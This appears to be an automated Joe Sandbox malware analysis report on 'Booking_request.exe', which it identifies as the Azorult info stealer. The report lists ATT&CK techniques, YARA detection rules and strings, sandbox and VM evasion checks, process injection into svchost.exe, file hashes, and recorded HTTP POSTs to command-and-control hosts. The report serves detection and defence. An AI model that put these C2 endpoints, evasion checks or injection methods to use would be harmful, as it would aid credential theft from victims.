
Analysis Report Booking_request.exe

Overview

General Information

Joe Sandbox Version: 28.0.0
Analysis ID: 53882
Start date: 24.02.2020
Start time: 11:04:08
Joe Sandbox Product: Cloud
Overall analysis duration: 0h 7m 6s
Hypervisor based Inspection enabled: true
Report type: full
Sample file name: Booking_request.exe
Cookbook file name: default.jbs
Analysis system description: Windows 10x64 HVM (IE 11.1, Chrome 67, Firefox 61, Adobe Reader 18, Java 8 Update 171)
Number of analysed new started processes: 17
Number of new started drivers analysed: 0
Number of existing processes analysed: 0
Number of existing drivers analysed: 0
Number of injected processes analysed: 0
Technologies:
  • EGA enabled
  • GSI enabled (VBA)
  • GSI enabled (Javascript)
  • GSI enabled (Java)
  • AMSI enabled
Analysis stop reason: Timeout
Detection: MAL
Classification: mal100.spyw.evad.winEXE@3/0@1/1
Cookbook Comments:
  • Adjust boot time
  • Enable AMSI
  • Found application associated with file extension: .exe
  • Stop behavior analysis, all processes terminated
Warnings:
  • Exclude process from analysis (whitelisted): MpCmdRun.exe, sc.exe, dllhost.exe, BackgroundTransferHost.exe, wermgr.exe, conhost.exe, backgroundTaskHost.exe, CompatTelRunner.exe
  • Excluded IPs from analysis (whitelisted): 52.142.119.134, 52.156.204.185, 52.229.171.202, 13.107.4.52, 13.68.93.109, 20.42.24.29, 40.91.91.94, 20.36.218.70, 2.18.68.82, 20.44.86.43, 40.90.22.190, 40.90.22.189, 40.90.22.191, 93.184.220.29, 104.18.24.243, 104.18.25.243, 40.112.91.29, 23.210.250.117, 92.122.213.194, 92.122.213.247, 52.164.221.179
  • Excluded domains from analysis (whitelisted): fe2.update.microsoft.com.nsatc.net, umwatson.trafficmanager.net, cs9.wac.phicdn.net, arc.msn.com.nsatc.net, ris-prod-atm-perf.trafficmanager.net, ocsp.msocsp.com, store-images.s-microsoft.com-c.edgekey.net, fs-wildcard.microsoft.com.edgekey.net, fs-wildcard.microsoft.com.edgekey.net.globalredir.akadns.net, a1449.dscg2.akamai.net, arc.msn.com, e12564.dspb.akamaiedge.net, ocsp.digicert.com, login.live.com, sls.update.microsoft.com, www.msftconnecttest.com, watson.telemetry.microsoft.com, img-prod-cms-rt-microsoft-com.akamaized.net, prod.fs.microsoft.com.akadns.net, ocsp.globalsign.cloud, fs.microsoft.com, sls.update.microsoft.com.akadns.net, settings-win.data.microsoft.com, e1723.g.akamaiedge.net, ipv4.login.msa.akadns6.net, v4ncsi.msedge.net, login.msa.msidentity.com, settingsfd-geo.trafficmanager.net, ris.api.iris.microsoft.com, sls.emea.update.microsoft.com.akadns.net, 4-c-0003.c-msedge.net, fe2.update.microsoft.com, hostedocsp.globalsign.com, store-images.s-microsoft.com, ncsi.4-c-0003.c-msedge.net, login.msa.akadns6.net
  • Report size getting too big, too many NtQueryValueKey calls found.

Detection

Strategy: Threshold
Score: 100
Range: 0 - 100
Reporting: Report FP / FN
Whitelisted: false
Threat: Azorult
Detection: malicious

Confidence

Strategy: Threshold
Score: 5
Range: 0 - 5
Further Analysis Required?: false


Classification

Mitre Att&ck Matrix

Techniques are listed per tactic; the numbers in parentheses are the signature counts the report attached to that technique.

Initial Access: Valid Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise; Exploit Public-Facing Application
Execution: Windows Remote Management; Service Execution; Windows Management Instrumentation; Scheduled Task; Command-Line Interface
Persistence: Winlogon Helper DLL; Port Monitors; Accessibility Features; System Firmware; Shortcut Modification
Privilege Escalation: Process Injection (411); Accessibility Features; Path Interception; DLL Search Order Hijacking; File System Permissions Weakness
Defense Evasion: Software Packing (1); Virtualization/Sandbox Evasion (1); Process Injection (411); Obfuscated Files or Information; Masquerading
Credential Access: Credential Dumping; Network Sniffing; Input Capture; Credentials in Files; Account Manipulation
Discovery: Virtualization/Sandbox Evasion (1); Process Discovery (1); Security Software Discovery (311); System Information Discovery (2); Remote System Discovery (1)
Lateral Movement: Application Deployment Software; Remote Services; Windows Remote Management; Logon Scripts; Shared Webroot
Collection: Data from Local System; Data from Removable Media; Data from Network Shared Drive; Input Capture; Data Staged
Exfiltration: Data Compressed; Exfiltration Over Other Network Medium; Automated Exfiltration; Data Encrypted; Scheduled Transfer
Command and Control: Standard Non-Application Layer Protocol (2); Standard Application Layer Protocol (12); Custom Cryptographic Protocol; Multiband Communication; Standard Cryptographic Protocol
Network Effects: Eavesdrop on Insecure Network Communication; Exploit SS7 to Redirect Phone Calls/SMS; Exploit SS7 to Track Device Location; SIM Card Swap; Manipulate Device Communication
Remote Service Effects: Remotely Track Device Without Authorization; Remotely Wipe Data Without Authorization; Obtain Device Cloud Backups
Impact: Modify System Partition; Device Lockout; Delete Device Data; Premium SMS Toll Fraud; Manipulate App Store Rankings or Ratings

Signature Overview



AV Detection:

Machine Learning detection for sample
  • Source: Booking_request.exe | Joe Sandbox ML: detected

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
  • Source: Traffic | Snort IDS: 2029466 ET TROJAN Win32/AZORult V3.3 Client Checkin M13 192.168.2.3:49843 -> 45.147.197.20:80
Uses a known web browser user agent for HTTP communication
  • Source: global traffic | HTTP traffic detected: POST /index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: sh1006535.had.su | Content-Length: 105 | Cache-Control: no-cache | Data Raw: 00 00 00 26 66 99 26 66 9b 42 70 9d 33 70 9d 34 70 9d 37 16 ec 26 67 ea 26 66 97 26 66 9a 26 66 9f 26 66 9a 26 66 97 26 66 9e 26 66 99 42 70 9c 47 70 9d 30 70 9d 36 70 9d 35 70 9d 30 70 9d 30 70 9d 3b 13 8b 30 6c 8b 31 11 eb 45 70 9d 31 16 e8 41 70 9d 36 70 9d 30 70 9c 47 70 9d 35 14 eb 40 70 9d 31 70 9d 33 10 ec | Data Ascii: &f&fBp3p4p7&g&f&f&f&f&f&f&fBpGp0p6p5p0p0p;0l1Ep1Ap6p0pGp5@p1p3
Performs DNS lookups
  • Source: unknown | DNS traffic detected: queries for: sh1006535.had.su
Posts data to webserver
  • Source: unknown | HTTP traffic detected: POST /index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: sh1006535.had.su | Content-Length: 105 | Cache-Control: no-cache | Data Raw: 00 00 00 26 66 99 26 66 9b 42 70 9d 33 70 9d 34 70 9d 37 16 ec 26 67 ea 26 66 97 26 66 9a 26 66 9f 26 66 9a 26 66 97 26 66 9e 26 66 99 42 70 9c 47 70 9d 30 70 9d 36 70 9d 35 70 9d 30 70 9d 30 70 9d 3b 13 8b 30 6c 8b 31 11 eb 45 70 9d 31 16 e8 41 70 9d 36 70 9d 30 70 9c 47 70 9d 35 14 eb 40 70 9d 31 70 9d 33 10 ec | Data Ascii: &f&fBp3p4p7&g&f&f&f&f&f&f&fBpGp0p6p5p0p0p;0l1Ep1Ap6p0pGp5@p1p3
Urls found in memory or binary data
  • Source: svchost.exe, 00000006.00000003.586724359.0000000004DA0000.00000004.00000001.sdmp | String found in binary or memory: http://195.245.112.115/index.php
  • Source: Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: http://ip-api.com/json
  • Source: Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp | String found in binary or memory: https://dotbit.me/a/

System Summary:

Malicious sample detected (through community Yara rule)
  • Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Azorult in memory, Author: JPCERT/CC Incident Response Group
  • Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: detect Azorult in memory, Author: JPCERT/CC Incident Response Group
  • Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: detect Azorult in memory, Author: JPCERT/CC Incident Response Group
  • Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Azorult Payload, Author: kevoreilly
PE / OLE file has an invalid certificate
  • Source: Booking_request.exe | Static PE information: invalid certificate
Sample file is different than original file name gathered from version info
  • Source: Booking_request.exe, 00000000.00000002.585333013.0000000000920000.00000002.00000001.sdmp | Binary or memory string: OriginalFilenameuser32j% vs Booking_request.exe
Yara signature match
  • Source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
  • Source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY | Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
  • Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Azorult author = JPCERT/CC Incident Response Group, description = detect Azorult in memory, rule_usage = memory scan, reference = internal research
  • Source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY | Matched rule: Azorult_1 author = kevoreilly, description = Azorult Payload, cape_type = Azorult Payload
PE file has section (not .text) which is very likely to contain packed code (zlib compression ratio < 0.011)
  • Source: Booking_request.exe | Static PE information: Section: .rr ZLIB complexity 0.999912239225
Classification label
  • Source: classification engine | Classification label: mal100.spyw.evad.winEXE@3/0@1/1
Creates mutexes
  • Source: C:\Windows\SysWOW64\svchost.exe | Mutant created: \Sessions\1\BaseNamedObjects\A75A074CB-9414907A-356338F9-EF2CFB53-6AEC20EB
  • Source: C:\Users\user\Desktop\Booking_request.exe | Mutant created: \Sessions\1\BaseNamedObjects\b2Zm
PE file has an executable .text section and no other executable section
  • Source: Booking_request.exe | Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Reads software policies
  • Source: C:\Users\user\Desktop\Booking_request.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Reads the hosts file
  • Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
  • Source: C:\Windows\SysWOW64\svchost.exe | File read: C:\Windows\System32\drivers\etc\hosts
Sample reads its own file content
  • Source: C:\Users\user\Desktop\Booking_request.exe | File read: C:\Users\user\Desktop\Booking_request.exe
Spawns processes
  • Source: unknown | Process created: C:\Users\user\Desktop\Booking_request.exe 'C:\Users\user\Desktop\Booking_request.exe'
  • Source: unknown | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
  • Source: C:\Users\user\Desktop\Booking_request.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe
Submission file is bigger than most known malware samples
  • Source: Booking_request.exe | Static file information: File size 1569992 > 1048576
PE file has a big raw section
  • Source: Booking_request.exe | Static PE information: Raw size of .rr is bigger than: 0x100000 < 0x110a00
PE file contains a mix of data directories often seen in goodware
  • Source: Booking_request.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IMPORT
  • Source: Booking_request.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_RESOURCE
  • Source: Booking_request.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_BASERELOC
  • Source: Booking_request.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
  • Source: Booking_request.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG
  • Source: Booking_request.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_IAT
Contains modern PE file flags such as dynamic base (ASLR) or NX
  • Source: Booking_request.exe | Static PE information: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
PE file contains a debug data directory
  • Source: Booking_request.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
PE file contains a valid data directory to section mapping
  • Source: Booking_request.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IMPORT is in: .rdata
  • Source: Booking_request.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_RESOURCE is in: .rsrc
  • Source: Booking_request.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_BASERELOC is in: .reloc
  • Source: Booking_request.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG is in: .rdata
  • Source: Booking_request.exe | Static PE information: Data directory: IMAGE_DIRECTORY_ENTRY_IAT is in: .rdata

Data Obfuscation:

PE file contains an invalid checksum
  • Source: Booking_request.exe | Static PE information: real checksum: 0x18086a should be: 0x189dcc
PE file contains sections with non-standard names
  • Source: Booking_request.exe | Static PE information: section name: .rr

Malware Analysis System Evasion:

Checks if the current machine is a sandbox (GetTickCount - Sleep)
  • Source: C:\Users\user\Desktop\Booking_request.exe | Function Chain: GetTickCount - Sleep - GetTickCount
Checks if the current machine is a sandbox (GlobalMemoryStatusEx - GetDesktopWindow - CreateToolhelp32Snapshot)
  • Source: C:\Users\user\Desktop\Booking_request.exe | Function Chain: GlobalMemoryStatusEx - GetDesktopWindow - CreateToolhelp32Snapshot
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
  • Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-32.EXE
  • Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp | Binary or memory string: FRIDA-WINJECTOR-HELPER-64.EXE
  • Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp | Binary or memory string: KERNEL32FRIDA-WINJECTOR-HELPER-32.EXE
  • Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp | Binary or memory string: USER32.DLLFRIDA-WINJECTOR-HELPER-64.EXE
May try to detect the virtual machine to hinder analysis (VM artifact strings found in memory)
  • Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp | Binary or memory string: VBoxService.exe
  • Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp | Binary or memory string: qemu-ga.exe
  • Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp | Binary or memory string: VBoxTray.exe
  • Source: Booking_request.exe, 00000000.00000002.585495140.000000000099E000.00000004.00020000.sdmp | Binary or memory string: VBoxTray.exeKernel32.dllKernel32GlobalMemoryStatusEx
Queries a list of all running processes
  • Source: C:\Users\user\Desktop\Booking_request.exe | Process information queried: ProcessInformation

Anti Debugging:

Checks if the current process is being debugged
  • Source: C:\Users\user\Desktop\Booking_request.exe | Process queried: DebugFlags

HIPS / PFW / Operating System Protection Evasion:

System process connects to network (likely due to code injection or exploit)
  • Source: C:\Windows\SysWOW64\svchost.exe | Network Connect: 45.147.197.20 80
Allocates memory in foreign processes
  • Source: C:\Users\user\Desktop\Booking_request.exe | Memory allocated: C:\Windows\SysWOW64\svchost.exe base: 400000 protect: page execute and read and write
Injects a PE file into a foreign process
  • Source: C:\Users\user\Desktop\Booking_request.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000 value starts with: 4D5A
Writes to foreign memory regions
  • Source: C:\Users\user\Desktop\Booking_request.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 400000
  • Source: C:\Users\user\Desktop\Booking_request.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 401000
  • Source: C:\Users\user\Desktop\Booking_request.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 41B000
  • Source: C:\Users\user\Desktop\Booking_request.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 41C000
  • Source: C:\Users\user\Desktop\Booking_request.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 41D000
  • Source: C:\Users\user\Desktop\Booking_request.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 41E000
  • Source: C:\Users\user\Desktop\Booking_request.exe | Memory written: C:\Windows\SysWOW64\svchost.exe base: 2FDC008
Creates a process in suspended mode (likely to inject code)
  • Source: C:\Users\user\Desktop\Booking_request.exe | Process created: C:\Windows\SysWOW64\svchost.exe C:\Windows\System32\svchost.exe

Language, Device and Operating System Detection:

Queries the cryptographic machine GUID
  • Source: C:\Windows\SysWOW64\svchost.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

Stealing of Sensitive Information:

Yara detected Azorult
  • Source: Yara match | File source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: Process Memory Space: Booking_request.exe PID: 1816, type: MEMORY
  • Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4412, type: MEMORY
Yara detected Azorult Info Stealer
  • Source: Yara match | File source: 00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp, type: MEMORY
  • Source: Yara match | File source: Process Memory Space: Booking_request.exe PID: 1816, type: MEMORY
  • Source: Yara match | File source: Process Memory Space: svchost.exe PID: 4412, type: MEMORY

Malware Configuration

No configs have been found

Behavior Graph


Simulations

Behavior and APIs

No simulations

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Source | Detection | Scanner | Label | Link
Booking_request.exe | 100% | Joe Sandbox ML | - | -

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

No Antivirus matches

Yara Overview

Initial Sample

No yara matches

PCAP (Network Traffic)

No yara matches

Dropped Files

No yara matches

Memory Dumps

Source | Rule | Description | Author
00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp | Azorult | detect Azorult in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x182a8:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x18908:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x19ff0:$v2: http://ip-api.com/json
  • 0x18c62:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
00000000.00000002.588278543.0000000002945000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp | Azorult | detect Azorult in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x964cc:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x96b2c:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x98214:$v2: http://ip-api.com/json
  • 0x96e86:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp | Azorult | detect Azorult in memory | JPCERT/CC Incident Response Group
  Strings:
  • 0x18618:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x18c78:$v1: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1)
  • 0x1a360:$v2: http://ip-api.com/json
  • 0x18fd2:$v3: C6 07 1E C6 47 01 15 C6 47 02 34
00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp | Azorult_1 | Azorult Payload | kevoreilly
  Strings:
  • 0x18878:$code1: C7 07 3C 00 00 00 8D 45 80 89 47 04 C7 47 08 20 00 00 00 8D 85 80 FE FF FF 89 47 10 C7 47 14 00 ...
  • 0x12cac:$string1: SELECT DATETIME( ((visits.visit_time/1000000)-11644473600),"unixepoch")
Process Memory Space: Booking_request.exe PID: 1816 | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
Process Memory Space: Booking_request.exe PID: 1816 | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security
Process Memory Space: svchost.exe PID: 4412 | JoeSecurity_Azorult | Yara detected Azorult Info Stealer | Joe Security
Process Memory Space: svchost.exe PID: 4412 | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security

Unpacked PEs

No yara matches

Sigma Overview

No Sigma rule has matched


Startup

  • System is w10x64_hvm
  • Booking_request.exe (PID: 1816 cmdline: 'C:\Users\user\Desktop\Booking_request.exe' MD5: FF17014CBB249E173309A9E1251E4574)
    • svchost.exe (PID: 4412 cmdline: C:\Windows\System32\svchost.exe MD5: FA6C268A5B5BDA067A901764D203D433)
  • cleanup

Created / dropped Files

No created / dropped files found

Domains and IPs

Contacted Domains

Name | IP | Active | Malicious | Antivirus Detection | Reputation
sh1006535.had.su | 45.147.197.20 | true | false | - | high

Contacted URLs

Name | Malicious | Antivirus Detection | Reputation
http://sh1006535.had.su/index.php | false | - | high

URLs from Memory and Binaries

Name | Source | Malicious | Antivirus Detection | Reputation
http://195.245.112.115/index.php | svchost.exe, 00000006.00000003.586724359.0000000004DA0000.00000004.00000001.sdmp | false | - | unknown
http://ip-api.com/json | Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp | false | - | high
https://dotbit.me/a/ | Booking_request.exe, 00000000.00000002.588062787.00000000027A9000.00000004.00000001.sdmp, svchost.exe, 00000006.00000002.587143259.0000000000400000.00000040.00000001.sdmp | false | - | unknown

Contacted IPs

Public

IP | Country | ASN | ASN Name | Malicious
45.147.197.20 | Ukraine | 204601 | unknown | false

Static File Info

General

File type: PE32 executable for MS Windows (GUI) Intel 80386 32-bit
Entropy (8bit): 7.7456665998838785
TrID:
  • Win32 Executable (generic) a (10002005/4) 99.96%
  • Generic Win/DOS Executable (2004/3) 0.02%
  • DOS Executable Generic (2002/1) 0.02%
  • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name: Booking_request.exe
File size: 1569992
MD5: ff17014cbb249e173309a9e1251e4574
SHA1: 951d86a32b4c894d0c2cabef15169896ba5cc667
SHA256: c3d5277a4f36f225c01cc9addfc46c1d83c89806ca609235f3b7469b79a30a52
SHA512: 711b6dc1ee18ef9c18e7e31fd671601bd8e3be2f5b940dfd7f47cb6cdb1c2a88e0c436060aed3273f6f974238bf5036e0084376c137f3f2a84076099c62b9da6
SSDEEP: 24576:v7pp8VT33GK1K5+Kitgqw0Q8Cj983NL8afZBX+syc/fDwjxf0PUr+Or7/2va9jb:v7pp8VT33tK5+KGgqw0Q1j989L8axEtF
File Content Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........9/T.XA..XA..XA..>B..XA..>D.]XA..>E..XA..0B..XA..0D..XA..0E..XA..>@..XA..X@..XA.w1H..XA..XA..XA.w1...XA.w1C..XA.Rich.XA........

File Icon

Icon Hash: 34e4c4d3c1c1d4e8

Static PE Info

General

Entrypoint: 0x432387
Entrypoint Section: .text
Digitally signed: true
Imagebase: 0x400000
Subsystem: windows gui
Image File Characteristics: 32BIT_MACHINE, EXECUTABLE_IMAGE
DLL Characteristics: TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
Time Stamp: 0x5E4BAD16 [Tue Feb 18 09:23:34 2020 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major: 6
OS Version Minor: 0
File Version Major: 6
File Version Minor: 0
Subsystem Version Major: 6
Subsystem Version Minor: 0
Import Hash: 7540297183c3e9767a796ad43bd5c7a0

Authenticode Signature

Signature Valid: false
Signature Issuer: CN=Microsoft Code Signing PCA, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Signature Validation Error: The digital signature of the object did not verify
Error Number: -2146869232
Not Before, Not After:
  • 8/11/2017 1:11:15 PM 8/11/2018 1:11:15 PM
Subject Chain:
  • CN=Microsoft Corporation, OU=MOPR, O=Microsoft Corporation, L=Redmond, S=Washington, C=US
Version: 3
Thumbprint MD5: 0F1A213D4DEFE693E7126AC57D432DBC
Thumbprint SHA-1: 5EAD300DC7E4D637948ECB0ED829A072BD152E17
Thumbprint SHA-256: FB2E0C65764535337434C74236BF4A109FD96E6D392828251D95086B6FD819C7
Serial: 33000001797C2E574E52E1CAD6000100000179

Entrypoint Preview

Instruction
call 220CE3B1h
jmp 220CD9EFh
mov ecx, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], ecx
pop ecx
pop edi
pop edi
pop esi
pop ebx
mov esp, ebp
pop ebp
push ecx
ret
mov ecx, dword ptr [ebp-10h]
xor ecx, ebp
call 220CD38Ah
jmp 220CDB50h
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0045E07Ch]
xor eax, ebp
push eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0045E07Ch]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], eax
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh
lea eax, dword ptr [ebp-0Ch]
mov dword ptr fs:[00000000h], eax
ret
push eax
push dword ptr fs:[00000000h]
lea eax, dword ptr [esp+0Ch]
sub esp, dword ptr [esp+0Ch]
push ebx
push esi
push edi
mov dword ptr [eax], ebp
mov ebp, eax
mov eax, dword ptr [0045E07Ch]
xor eax, ebp
push eax
mov dword ptr [ebp-10h], esp
push dword ptr [ebp-04h]
mov dword ptr [ebp-04h], FFFFFFFFh

                                Data Directories

                                Name | Virtual Address | Virtual Size | Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IMPORT | 0x5d194 | 0x50 | .rdata
                                IMAGE_DIRECTORY_ENTRY_RESOURCE | 0x61000 | 0xa6c7 | .rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_SECURITY | 0x17b600 | 0x3ec8 | .rr
                                IMAGE_DIRECTORY_ENTRY_BASERELOC | 0x6c000 | 0x2640 | .reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG | 0x5b6b0 | 0x38 | .rdata
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_TLS | 0x5b788 | 0x18 | .rdata
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x5b6e8 | 0x40 | .rdata
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_IAT | 0x4e000 | 0x184 | .rdata
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x0 | 0x0 |
                                IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |

                                Sections

                                Name | Virtual Address | Virtual Size | Raw Size | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
                                .text | 0x1000 | 0x4ca6f | 0x4cc00 | False | 0.471043490432 | DBase 3 data file | 6.18164838537 | IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rdata | 0x4e000 | 0xfa62 | 0xfc00 | False | 0.487103174603 | data | 5.40686836361 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .data | 0x5e000 | 0x21a8 | 0x1000 | False | 0.212646484375 | data | 3.229547095 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_WRITE, IMAGE_SCN_MEM_READ
                                .rsrc | 0x61000 | 0xa6c7 | 0xa800 | False | 0.0521995907738 | data | 2.83288306169 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc | 0x6c000 | 0x2640 | 0x2800 | False | 0.7126953125 | data | 6.49255813867 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
                                .rr | 0x6f000 | 0x111000 | 0x110a00 | False | 0.999912239225 | Applesoft BASIC program data | 7.9997801217 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

                                Resources

